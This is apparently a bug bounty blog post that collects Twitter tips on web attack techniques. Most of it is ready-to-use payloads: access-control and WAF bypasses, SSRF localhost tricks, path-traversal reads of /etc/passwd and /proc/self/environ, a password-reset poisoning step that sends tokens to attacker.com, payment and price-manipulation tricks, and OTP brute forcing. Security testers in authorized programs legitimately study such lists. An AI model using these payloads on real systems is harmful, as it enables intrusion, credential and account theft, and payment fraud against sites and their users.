#Bugbountytips

Before you start reading this post, let me tell you all the tips are collected from twitter (few mine 😓) where awesome community folks share their knowledge and experience. I tried to mention every single twitter handle from where I refer the tips, in case your name missed out please reach out to me. 😉

Authentication

# Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header.

POST /admin/deleteUser HTTP/1.1 -> 403

POST / HTTP/1.1 

X-Original-URL: /admin/deleteUser -> 200OK 

Bypass Success!

# Accessing the Admin Panel

https://target.com/admin/ - 302

https://target.com/admin..;/ - 200

IDOR

#Suppose you find endpoint 

GET /api_v1/messages?user_id=Your_user_id

Try

"GET /api v1/messages?user_id=Another_user_id"

"GET /api_v1/messages?user_id=Your_user_id&user_id=another_user_id"

"GET /api_v1/messages?user_id=another_user_id&user_id=Your_user_id"

CORS

# CORS Protection RegEx Bypass

If the target only allows main-domain and subdomains, try to write something at the beginning of the main-domain.

Origin: target.com --> Access-Control-Allow-Origin: target.com

Origin: eviltarget.com --> Not Vulnerable

Origin: sub.eviltarget.com --> Access-Control-Allow-Origin: sub.eviltarget.com

SQL Injection

# If you ever stuck with SQL + WAF (IP based)

1. Make use of IP Rotate Extension in burp and configure with AWS creds

2. Use Sqlmap with --proxy flag to route traffic via burp

3. Bypass+1 Exploit+1 

RCE

# Handy as hell tip for checking which functions you need to by pass on PHP 

<?php var_dump(explode(',',ini_get('disable_functions'))); ?>

# Parse http://cvedetails.com for scores 6+ going back 3 years for vulns. Visit the reference pages for web vulns in this filter. Grab the paths for those vulns. Build your own RCE word list.

SSRF

# Bypass localhost IP blocked on SSRF

Create a subdomain and resolve it to 127.0.0.1 

You can also use post swagger subdomain, it's resolve to the localhost IP also: spoofed.burpcollaborator.net 

# One liner command(both manual & automatic)

Automatic One Liner SSRF:

assetfinder --subs-only target | httprobe | gau | gf ssrf | nuclei -t nuclei-templates/vulnerabilities/microstrategy-ssrf.yaml -o result.txt

Manual testing SSRF:

assetfinder --subs-only target | httprobe | gau | gf ssrf | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk 2>/dev/null

Then use burp collaborator to manipulate ssrf.

# Using IP Decimal to bypass '.' blacklisted character

Google IP: 216.58.212.110

Google IP Decimal: 3627734126

Example: target.com?redirect=http://3627734126 - Done

# Bypassing SSRF with CIDR

http://127.127.127.127

http://127.0.0.1

# Bypass using rare address

http://127.1

http://0/

# Bypass using tricks combination

http://1.1.1.1 &@2.2.2.2# @3.3.3.3/

urllib : 3.3.3.3

# Bypass against a weak parser

http://127.1.1.1:80\@127.2.2.2:80/

# Bypass localhost with [::]

http://[::]80/

http://0000::1:80/

# Sentry Blind SSRF

1. cat aquatone/*/urls.txt | grep sentry 

2. Burpsuite 

3. Send it to Repeater 

4. Change the value of filename: to a http://postb.in url (or similar) 

5. Wait for a connection 

# See a target running on Nginx?

GET @xx.collab.net/ or http://xxx.collaborator.net HTTP/1.1 

Host: target[.]com 

Always try for absolute urls. This has been affecting many apps. old is gold for ssrf.

# A small Burpsuite trick which helped me to find Blind SSRF

1: Use Intruder to Bruteforce Headers 

2: Add Burp collaborator URL as value. 

3: Add prefix numerical payload (Pitchfork) 

4: Use Tarborator Extension to monitor hits

Security Misconfiguation

# Easy way to find exposed production code: 

1. Find a Gitlab hosted sub domain, usually named “code.domain” or “gitlab.domain” 

2. Even if login is required, try the “/snippets” endpoint. 

3. View internal source code snippets.

# Ways to bypass rate limit

1. Use the following request-header: X-Remote-IP: 127.0.0.1

2. Add 'Space' after the parameter value

3. Using null byte and CRLF '%00, %0d%0a, %09, %20, %0'

4. Changing user-agents and/or cookies

File Upload 

# Extension list for File upload bugs ASP: 

".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp", ".cer", "shtml"

Local File Inclusion

# How to find local file read vulnerabilities based on cookies. 

Request 

GET /vulnerable.php HTTP/1.1 

Cookie:usid=../../../../../../../../../../../../../etc/passwd 

Response 

HTTP/1.1 200 OK 

... 

Server: Apache root:fi3sER6:0:1:System Operator:/:/bin/ksh//

# If you've got a cloud system and a LFI always have a peak at /etc/fstab you might be able to find more mounts like S3 buckets or efs shares with more juice.

# Escalate local file Inclusion

Try these files: "/proc/self/cmdline" "/proc/self/environ".  There might be keys or other sensitive information in there or it might give you ideas for other paths to investigate.

Account Takeover

#

1. Go to forget password add email > reset password

2. Intercept this request.

3. Add "X-forwarded-host: attacker.com"

4. Forward this request and check your email inbox.

5. If password reset link look like "http://www.attacker.com/reset-password/<reset_token>

6. For confirmation of password reset link valid or not, replace attacker.com URL with original URL click go.

#Using the password reset code more than once

Reset password base64 code/token:

cGFzc3dvcmR0b2tlbg=

Add another equal:

cGFzc3dvcmR0b2tlbg==

Add another equal:

cGFzc3dvcmR0b2tlbg===

Each time you add another equal, the code will work again.

Full Path Disclosure

# A useful tip for finding Full Path Disclosure vulnerabilities 

Drop an array ([] or even [1,2,3]) into a parameter. This can produce a full path disclosure error in response.

Price Manipulation Bugs

# Bypass the payment process and get the product without paying

1. It is preferable to choose Paypal or CoinPayments as a payment method.

2. Intercept all requests, you may find a parameter called 'Success' or 'Referrer' or 'Callback'

3. If the value inside the parameter  has a URL like this example.com/payment/MD5HASH for example

4. Copy it, and open it in a new window, you will find that your payment was successful.

# If the product price parameter can not be changed, change the quantity of products

items[1][quantity]=1  --> 234 $

items[1][quantity]=0.1 --> 23.4 $

Congratulations, you bought the order for 1% of the price.

# 

1. Add two products to the basket [Let's consider a single product $40 ]

2. If the request is processed in this way : {"items":{"laptop":1,"mobile":1}}

3. Change the JSON body to {"items":{"laptop":4,"mobile":-2}}

4. The cost will become $20 for two items: 4 * $40 - 2 * $70 = $160 - $140 = $20

2FA

# No limit to send OTP by SMS
Impact would be DoS on user's phone

# No limit to refresh OTP
You can "infinitely" brute OTP constantly refreshing it with a low probability to guess

# Bruteforce OTP if there is no limit to verify OTP

# Check if 
No 2FA for disabling 2FA in account
No 2FA confirmation for password change
After 2FA activation other existing sessions still active/
You can reuse OTP from one action to other.
You can reuse your OTP to login as another user.

# Observed if, after password check a valid session has been created - Ignore 2FA

# OTP is associated with token. After refreshing a new OTP associated with a new token, but old pair is still valid.

# Sometimes OTP is leaked in header, response body or error

# Try to send OTP for different users in the same second.

Credits:

ADITYASHENDE17, jae_hak99, Random_Robbie, SalahHasoneh1, heald_ben, hsakarp_ilajna, Jhaddix, th3hokag3, Virdoex_hunter, Harshithvelneni, chiraggupta8769, trbughunters, EngMada9, scspcommunity, _n0nce, lutfumertceylan, cybersec_feeds, manas_hunter, AkaaZaan, Random_Robbie

, bpruston, AmitMDubey, hackerscrolls

(If you like the blog, share it with others 💓. 

DM or tag me in tweets if you want to include any other bugbountytips in this blog.)